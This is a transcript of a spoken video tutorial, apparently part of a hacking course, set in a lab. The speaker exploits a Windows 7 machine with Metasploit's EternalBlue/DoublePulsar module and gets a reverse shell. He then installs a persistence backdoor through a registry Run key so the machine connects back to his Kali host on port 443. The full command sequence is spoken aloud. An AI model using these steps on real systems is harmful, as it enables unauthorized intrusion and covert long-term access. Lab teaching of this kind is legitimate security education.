Hello everybody and welcome back. And now let us start off by actually running the persistent on our target machine. So I'm starting up right here Windows 7, and let's start Windows normally since I had a problem running it a few seconds ago. And right now what we will try is we will try to actually run a persistence backdoor on the target system, which would actually allow us to connect to it anytime we want. So basically, if you have noticed, once we get the interpreter shell and if we reboot the machine, we will not be able to connect back to the target. So target could actually prevent us from exploiting their computer or actually gathering some information after we get the shell open by just shutting down the PC if we didn't run the persistence. So the persistence is something that you want to run at the very beginning of exploitation. Right after you get the interpreter shell, that is most likely the first thing you want to do. So let us see how we can do that. So I opened up my Windows 7 machine. It is working normally. Let us just check out once again its IP address. So it should be .1.5, I believe. IP config. And it really is .1.5. So right now let us go to our Kali Linux machine. And right here we have the Metasploit open, and what we want to do, basically, let's perform the previous exploit real fast. So, pardon me, we want to use exploit, Windows, SMB, Eternal Blue, Double Pulsar, show options. We want to set our hosts to 192.168.1.4, set target architecture to x64 since Windows 7 is 64-bit, set process, inject to this file, we paste it right here, we set payload to be Windows x64 interpreter reverse TCP, set lhost at the end to be 192.168.1.4. Pardon me, our host should be the IP address of the Windows 7 machine, so let's change that. So set our hosts 192.168.1.5, which is the IP address of our Windows 7 machine. So show options, and right now we should be good to go. So just run here exploit, and we should get an interpreter shell with system privileges on target system. So after we do that, we will load a module called persistence, and we will actually try to get the interpreter shell back even after we reboot the Windows 7 machine. But before we do that, we need to wait for our session to open. So I hope it will do it real fast. So let's see. Launching Internal Blue. We specified everything correctly. Timed out, waiting to select, notify event. What do you mean by that? But we did get the shell back, so it doesn't really matter. Get user ID, and we are system. So not really sure what this error right here is, but we were able to get the system. So print working directory, we can see that we are in C Windows System 32. Good. Now, after we actually exploited, now let's run the persistence. So we run it with this command, so run persistence -h to see our available options. Let me just see, usage run executes a Ruby script or Metasploit post module in the context of the interpreter session. Post module can take. Okay, so it doesn't give us the module options, but it doesn't matter. I will just type here the command and I will explain to you what it all means. So let us run the command. So what you want to do is run persistence -u, which basically stands for automatically start the program or our reverse shell when the user logs on. Now you can also use -x, so when the user when the system boots, you can use that. So -x is automatically start the agent when the system boots, and -u is automatically start the agent when the user logs in. We will use -u in this case. Now we will use -i for the interval between each connection attempt. So for example, let's say we weren't able to actually set up our listener at the correct time when the system was booted, and we missed the first connection try. So we want to set this to try to connect to us every, for example, 10 seconds. So let's type here 10 seconds. So we can actually connect anytime we want while the system is running. So the thing that we want to specify after that is -p for the port, and let's use port 443. And of course, after that you want to use -r, which is the remote address of the, basically this is our IP address. So this is the IP address that the target machine will try to connect to, which should be the IP address of your Kali Linux machine, which in my case is .1.4. So after you do that, you just click here enter, run persistence, and we specify the entire command right here, and it will run the persistence for us, and it will create a registry key in the registry key folder. So we can see right here. Let's actually analyze this a little bit. So what this did is basically persistence script written to this path right here. So in temp we got the .vbs script, which is with a weird name, and basically what this VBS script is basically just a copy of the interpreter shell in the temporary folder, and it also created a registry key in the current user registry in the run startup folder, and it named it like this. So basically what this registry key does is that every boot up it will run this program, which is our interpreter shell. It will also try to connect every 10 seconds. So now that we actually ran the persistence, let's actually reboot the machine and see if it works. Now while you reboot the machine, you need to actually set up the listener. Since our eternal blue double pulsar isn't really a listener, we need to set up a regular use exploit multi-handler and then our regular listener. So let's reboot the machine, and we can check out the machine really is shutting down. So it is rebooting or restarting, and while we do that, we want to exit this, and we want to use exploit multi-handler set payload to be the same payload we specified in the exploit. So Windows x64 interpreter reverse TCP, set lhost to be 192.168.1.4, and set L port to be 443, since L port 443 is something that we specified in our persistence command. And now we type exploit, and we are waiting for incoming connections. And it should prompt us with a interpreter shell as soon as this Windows 7 machine boots up. So let's wait for it to connect to the internet. And in just a few seconds we should be getting the interpreter session opened. We still didn't get it. No idea why, but it should come soon. No idea why we didn't get it. We should have got it, so we can check the registry in this Windows 7. So let's go run, and then let's open regedit right here. In order for us to open the registry folder, let's go to the registry where we saved our files. So current user, software, Microsoft, then we go to the Windows, I believe. Okay, so Windows, current version, and then run. Value not set. So we were not even able to set the value for it. Now, why didn't it set? I have no idea. Let us try it once again. So let's close this. Let's actually use the same thing as before, which is the use exploit multi-handler double pulsar, show options. So we should already have everything as sets, and exploit this. And let's see if I run the same command in the interpreter, will we get the registry key right here. Let's actually check in the CMD, so change app data. Wait, let's just wait for this to open. It should have written us a registry key, not really sure why it didn't, but we will try to fix that right now. So we got the interpreter session open with eternal blue double pulsar, and what we want to do is actually run the same command as before. Run persistence as user logs in, or let's actually type as system boots, interval 10 seconds, remote address to be this one. And hopefully right now, if we refresh this, so it created at local machine. So now it is created at local machine. So let's see if it is there. It should be named like this. So this random letter. So let's go to the local machine, to the software, to the Microsoft, to the Windows. It is basically the same path. You just find where Windows is. Okay, so Windows, current version, and then the run folder. And let's see if it is there. And here it is. So right now, this did work. So let me just see right now if we reboot the PC right now and exit the session and set up our handler once again. So multi-handler, show options, and we exploit since everything is already set. So the IP address set, the port set, and we run this. Now the problem could be is that this puts in the temp directory, which I think we can change, but basically this is the idea of the persistence. We can actually specify the directory as well if we wanted to, so we do not need to put it into temporary directory. I'm not really sure if temp directory actually deletes all the files at the reboot. So let's see if we open up the run once again. So run, and then regedit. We go right there. We want to open that. We go to the local machine, software, Microsoft, to the Windows, I believe. Should be Windows. Okay, so it is all the way down. Windows, current version, and then the run right here. And we still have it right there, so I'm not really sure why this doesn't work, why it won't open the file. But basically this is the simple idea behind this. Now I tried this yesterday on Windows 10 and it does work, so maybe it's some problem with the Windows 7, it doesn't even matter. Now the point is that this basically that this is the process of actually making a persistence. So you should actually be able to use this on Windows 10, for example. Not really sure why it doesn't work here. I will actually check it out and maybe tell you in the next video what the problem was, if there was any problem. And that would be about it for this tutorial. I hope I see you in the next one, and take care. Bye.